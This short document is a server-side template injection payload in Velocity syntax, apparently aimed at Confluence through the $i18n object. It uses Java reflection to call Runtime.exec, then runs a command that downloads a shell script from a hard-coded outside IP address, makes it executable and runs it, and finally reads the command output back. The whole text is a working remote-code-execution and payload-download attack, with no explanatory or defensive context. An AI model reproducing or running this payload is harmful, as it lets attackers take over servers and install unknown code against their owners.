#set($ex=$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('wget -O /tmp/tmp.sh http://125.212.193.192:8081/wls-wsat/tmp.sh&& chmod 777 /tmp/tmp.sh &&/tmp/tmp.sh'))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$out.read()
#end
